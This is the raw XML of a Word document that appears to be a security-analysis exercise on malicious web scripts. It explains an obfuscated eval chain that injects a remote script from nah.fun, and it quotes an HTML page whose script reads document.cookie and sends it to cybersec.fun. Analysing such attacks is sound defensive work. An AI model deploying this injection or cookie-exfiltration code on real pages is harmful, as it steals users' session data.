        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>", "https://nah.fun/q2bi.js");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="673E6162" w14:textId="3533BFDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>body.appendChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(e);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="4B0FFF87" w14:textId="59E06413">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="21CD94CF" w14:textId="0970BDC8"/>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="577D8C49" w14:textId="37D3698A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr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(b=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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atob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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),(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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)=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="09885A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r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) returns the function () =&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="272B5A9B" w14:textId="52D66FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr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(() =&gt; 1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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).</w:t>
      </w:r>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>constructor</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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(b) causes the malicious JavaScript code to be executed when this function is called with (</w:t>
      </w:r>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r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 xml:space="preserve"> b)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="0BD65430" w14:textId="2022A24D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>As b wasn’t declared with the var keyword, the delete operator resets its value to null.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="7854A6F7" w14:textId="05968E4B">
      <w:r>
        <w:t>Reflected XSS?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="2851AF29" w14:textId="07C6BFC4">
      <w:r>
        <w:t>SELF-XSS?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="040E39D2" w14:textId="718874E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>drive-by download?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="576EC2CF" w14:textId="6BCA5745">
      <w:r>
        <w:t xml:space="preserve">This could be considered as a form of cross-site scripting using remote file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>inclusion</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="78AF17C7" w14:textId="30C2FB4D">
      <w:r>
        <w:t xml:space="preserve">ii) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="11D686ED" w14:textId="3105CDEF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Nah.fun.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="297E870F" w14:textId="2CBCC3F3">
      <w:r>
        <w:t>&lt;html&gt;&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="0CB53F14" w14:textId="4D72C5A5">
      <w:r>
        <w:t>&lt;meta http-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>equiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="content-type" content="text/html; charset=windows-1252"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="0AF0754C" w14:textId="56F47B41">
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="02FC9731" w14:textId="2B2C12E9"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7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="4DE1E732" w14:textId="2A45477F">
      <w:r>
        <w:t xml:space="preserve">     display: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>block;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="381A8CB5" w14:textId="6AB7A9E0">
      <w:r>
        <w:t xml:space="preserve">     margin-left: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>auto;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="1B1DD6C4" w14:textId="658A2D32">
      <w:r>
        <w:t xml:space="preserve">     margin-right: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>auto;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="6BF9DE0E" w14:textId="5C82A5CF">
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="590C4EC7" w14:textId="1DD312CD">
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="515DF09E" w14:textId="4DF6B7E7">
      <w:r>
        <w:t xml:space="preserve">    &lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="4D51B2AF" w14:textId="2997920C">
      <w:r>
        <w:t xml:space="preserve">    &lt;body style="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;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="163ABF58" w14:textId="4AA81C8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nah.fun_files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/hackr.gif"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="554146A6" w14:textId="63299C59">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="0EAD7FA4" w14:textId="226BAA7B">
      <w:r>
        <w:t>b=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('=')[1]+'=';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="25CF4081" w14:textId="2B8EBA1C">
      <w:r>
        <w:t>if (/^17\./.test('31.14.251.27'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>b(b=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b.slice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2))};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="2452DA72" w14:textId="274A0A00">
      <w:r>
        <w:t>b=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>b.slice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(0,-2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="4B64B07B" w14:textId="7718B35D">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="315FE786" w14:textId="6EA89E63">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="2270BF5D" w14:textId="14AD0263">
      <w:r>
        <w:t xml:space="preserve">    open('https://cybersec.fun/setup.cgi?'+atob(b)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="33D3E9C2" w14:textId="6B9C6C91">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="702EEF08" w14:textId="740EA0E9">
      <w:r>
        <w:t>&lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="7EAE1F50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2523" w:rsidRDefault="00622523" w14:paraId="351A66B9" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00622523" w:rsidRDefault="00622523" w14:paraId="10CC49B4" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="00622523" w:rsidRDefault="00622523" w14:paraId="028371A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5D376B" w:rsidTr="415D376B" w14:paraId="3EF48F8B" w14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="415D376B" w14:paraId="10988041" w14:textId="676D7CAE">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="415D376B" w14:paraId="63715647" w14:textId="69F83324">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="415D376B" w14:paraId="68A80BA7" w14:textId="0731ED78">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="415D376B" w14:paraId="0E56F3F3" w14:textId="35EF5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2523" w:rsidRDefault="00622523" w14:paraId="537A3B58" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00622523" w:rsidRDefault="00622523" w14:paraId="7B40C388" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="00622523" w:rsidRDefault="00622523" w14:paraId="108555D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5D376B" w:rsidTr="415D376B" w14:paraId="2D03BC98" w14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="415D376B" w14:paraId="6843D9CC" w14:textId="5EE4B7A9">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="415D376B" w14:paraId="525CFD4C" w14:textId="2133DA79">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="415D376B" w14:paraId="0785F3C0" w14:textId="78770212">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="415D376B" w14:paraId="2ED4FB93" w14:textId="4BB4E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F9EBC3"/>
    <w:rsid w:val="001700F9"/>
    <w:rsid w:val="0022191A"/>
    <w:rsid w:val="0027C9EB"/>
    <w:rsid w:val="002969BB"/>
    <w:rsid w:val="003C275F"/>
    <w:rsid w:val="00485C5D"/>
    <w:rsid w:val="004C619C"/>
    <w:rsid w:val="006062EE"/>
    <w:rsid w:val="00610618"/>
    <w:rsid w:val="00622523"/>
    <w:rsid w:val="007D167D"/>
    <w:rsid w:val="00844B17"/>
    <w:rsid w:val="008C25F2"/>
    <w:rsid w:val="009E4FE9"/>
    <w:rsid w:val="00DE64A4"/>
    <w:rsid w:val="00F04AEE"/>
    <w:rsid w:val="01516D9B"/>
    <w:rsid w:val="018919A8"/>
    <w:rsid w:val="01AC3857"/>
    <w:rsid w:val="01F12F46"/>
    <w:rsid w:val="0208CA2B"/>
    <w:rsid w:val="026323B7"/>
    <w:rsid w:val="0291FA1C"/>
    <w:rsid w:val="02F49979"/>
    <w:rsid w:val="0376FF73"/>
    <w:rsid w:val="054064CE"/>
    <w:rsid w:val="05C72A83"/>
    <w:rsid w:val="05CBC5ED"/>
    <w:rsid w:val="05D7693B"/>
    <w:rsid w:val="088C3F5C"/>
    <w:rsid w:val="08A7748B"/>
    <w:rsid w:val="08CCA3BF"/>
    <w:rsid w:val="08E81343"/>
    <w:rsid w:val="0983F558"/>
    <w:rsid w:val="099C6508"/>
    <w:rsid w:val="09B551FE"/>
    <w:rsid w:val="09E6847F"/>
    <w:rsid w:val="0ADF9295"/>
    <w:rsid w:val="0B69B344"/>
    <w:rsid w:val="0D8FD62A"/>
    <w:rsid w:val="0EA811A1"/>
    <w:rsid w:val="0FF072C3"/>
    <w:rsid w:val="10617D90"/>
    <w:rsid w:val="10B79CDB"/>
    <w:rsid w:val="1354AC60"/>
    <w:rsid w:val="1382B87C"/>
    <w:rsid w:val="1388FEF5"/>
    <w:rsid w:val="14508EAF"/>
    <w:rsid w:val="146CE7D7"/>
    <w:rsid w:val="14E95984"/>
    <w:rsid w:val="1523D337"/>
    <w:rsid w:val="15A7CCC8"/>
    <w:rsid w:val="1820959F"/>
    <w:rsid w:val="18658C8E"/>
    <w:rsid w:val="1A31ED60"/>
    <w:rsid w:val="1A46B885"/>
    <w:rsid w:val="1AA3CE8C"/>
    <w:rsid w:val="1B4A22B8"/>
    <w:rsid w:val="1B7142AF"/>
    <w:rsid w:val="1B77203A"/>
    <w:rsid w:val="1B7B8986"/>
    <w:rsid w:val="1C3971BA"/>
    <w:rsid w:val="1C7A8A6D"/>
    <w:rsid w:val="1CA06AD1"/>
    <w:rsid w:val="1D777F9D"/>
    <w:rsid w:val="1E563605"/>
    <w:rsid w:val="1F3F9F46"/>
    <w:rsid w:val="1FEE9D20"/>
    <w:rsid w:val="2057DABD"/>
    <w:rsid w:val="20F6CCB0"/>
    <w:rsid w:val="26A6E4A3"/>
    <w:rsid w:val="26E5A173"/>
    <w:rsid w:val="28010513"/>
    <w:rsid w:val="283557A8"/>
    <w:rsid w:val="28927AD5"/>
    <w:rsid w:val="28BF7857"/>
    <w:rsid w:val="2919408A"/>
    <w:rsid w:val="29B8327D"/>
    <w:rsid w:val="2A5A4C99"/>
    <w:rsid w:val="2A76A5C1"/>
    <w:rsid w:val="2BB18AB2"/>
    <w:rsid w:val="2C1EB9C6"/>
    <w:rsid w:val="2D076805"/>
    <w:rsid w:val="2D3931FE"/>
    <w:rsid w:val="2E12274B"/>
    <w:rsid w:val="309E047B"/>
    <w:rsid w:val="313BE735"/>
    <w:rsid w:val="31FA27A8"/>
    <w:rsid w:val="33265C09"/>
    <w:rsid w:val="349B28A4"/>
    <w:rsid w:val="34C14835"/>
    <w:rsid w:val="36279616"/>
    <w:rsid w:val="37788913"/>
    <w:rsid w:val="37BEFDDE"/>
    <w:rsid w:val="381728DD"/>
    <w:rsid w:val="3871365C"/>
    <w:rsid w:val="38AD63FC"/>
    <w:rsid w:val="3A7F4D5A"/>
    <w:rsid w:val="3B4CE4D4"/>
    <w:rsid w:val="3BE5CB3B"/>
    <w:rsid w:val="3D59CBEA"/>
    <w:rsid w:val="3E404482"/>
    <w:rsid w:val="3E9C38BF"/>
    <w:rsid w:val="410D1410"/>
    <w:rsid w:val="4149542B"/>
    <w:rsid w:val="415D376B"/>
    <w:rsid w:val="421543A0"/>
    <w:rsid w:val="43A9F0C4"/>
    <w:rsid w:val="4433DEA2"/>
    <w:rsid w:val="44686408"/>
    <w:rsid w:val="449931E2"/>
    <w:rsid w:val="44CCBBF2"/>
    <w:rsid w:val="45686828"/>
    <w:rsid w:val="465A3459"/>
    <w:rsid w:val="468731DB"/>
    <w:rsid w:val="4745A51F"/>
    <w:rsid w:val="47726FD0"/>
    <w:rsid w:val="47CCE3A4"/>
    <w:rsid w:val="47D0D2A4"/>
    <w:rsid w:val="4961F4BC"/>
    <w:rsid w:val="4CC59D75"/>
    <w:rsid w:val="4D1C4DA4"/>
    <w:rsid w:val="4E32068A"/>
    <w:rsid w:val="4FA25FDB"/>
    <w:rsid w:val="4FB29E93"/>
    <w:rsid w:val="4FEEDEAE"/>
    <w:rsid w:val="501F0459"/>
    <w:rsid w:val="51F5B314"/>
    <w:rsid w:val="52EBA116"/>
    <w:rsid w:val="53A28C76"/>
    <w:rsid w:val="5424BF9F"/>
    <w:rsid w:val="546E7BEB"/>
    <w:rsid w:val="54BAC7ED"/>
    <w:rsid w:val="554C3DAF"/>
    <w:rsid w:val="55950B01"/>
    <w:rsid w:val="571B9757"/>
    <w:rsid w:val="575BC8E9"/>
    <w:rsid w:val="57800F97"/>
    <w:rsid w:val="581F018A"/>
    <w:rsid w:val="590D67A8"/>
    <w:rsid w:val="593A652A"/>
    <w:rsid w:val="593E4328"/>
    <w:rsid w:val="59B3AEAE"/>
    <w:rsid w:val="5B667C5D"/>
    <w:rsid w:val="5B8D8592"/>
    <w:rsid w:val="5CEAEAC9"/>
    <w:rsid w:val="5CF9EBC3"/>
    <w:rsid w:val="5D2FE1B8"/>
    <w:rsid w:val="5D3736CB"/>
    <w:rsid w:val="5ECAEC35"/>
    <w:rsid w:val="5F110DAF"/>
    <w:rsid w:val="5FEF4790"/>
    <w:rsid w:val="61AD42CE"/>
    <w:rsid w:val="61EE4EC6"/>
    <w:rsid w:val="629314B0"/>
    <w:rsid w:val="629495CC"/>
    <w:rsid w:val="62BA3E3B"/>
    <w:rsid w:val="62EE90D0"/>
    <w:rsid w:val="6326E852"/>
    <w:rsid w:val="63AFF96C"/>
    <w:rsid w:val="63B6208A"/>
    <w:rsid w:val="63D279B2"/>
    <w:rsid w:val="645F2A17"/>
    <w:rsid w:val="64993F23"/>
    <w:rsid w:val="650D5EA3"/>
    <w:rsid w:val="668433C8"/>
    <w:rsid w:val="66ED29D4"/>
    <w:rsid w:val="6786277A"/>
    <w:rsid w:val="67BAE699"/>
    <w:rsid w:val="69F16DB6"/>
    <w:rsid w:val="6C04A747"/>
    <w:rsid w:val="6D2FD27D"/>
    <w:rsid w:val="6DF43A0E"/>
    <w:rsid w:val="6F24A1C3"/>
    <w:rsid w:val="6FDF2B73"/>
    <w:rsid w:val="6FEAF4F8"/>
    <w:rsid w:val="705C5E8B"/>
    <w:rsid w:val="72F4A8B3"/>
    <w:rsid w:val="734BA4C2"/>
    <w:rsid w:val="73DCFA2E"/>
    <w:rsid w:val="73F7E015"/>
    <w:rsid w:val="748C12EF"/>
    <w:rsid w:val="7547C91B"/>
    <w:rsid w:val="77C05F21"/>
    <w:rsid w:val="77F80CB0"/>
    <w:rsid w:val="7884C6B2"/>
    <w:rsid w:val="7908F314"/>
    <w:rsid w:val="797AE785"/>
    <w:rsid w:val="79D91851"/>
    <w:rsid w:val="7A58A949"/>
    <w:rsid w:val="7A6DAD5E"/>
    <w:rsid w:val="7AB2A44D"/>
    <w:rsid w:val="7D0FE369"/>
    <w:rsid w:val="7D6AB417"/>
    <w:rsid w:val="7D973A77"/>
    <w:rsid w:val="7DA5C882"/>
    <w:rsid w:val="7E4B888C"/>
    <w:rsid w:val="7EAE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EBC3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4AD58092-361A-47FA-9F16-D28A54BD73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db456@cybersec.fun" TargetMode="External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yperlink" Target="mailto:bt@cybersec.fun" TargetMode="External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331.cybersec.fun/" TargetMode="Externa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yperlink" Target="https://thehackernews.com/2021/08/mozi-iot-botnet-now-also-targets.htm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securitynews.sonicwall.com/xmlpost/thinkphp-remote-code-execution-rce-bug-is-actively-being-exploited/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Venetidis, Alexander</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Chew, Khemi</lastModifiedBy>
  <revision>11</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-18T19:31:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-23T02:05:32.4713528Z</dcterms:modified>
</coreProperties>
</file>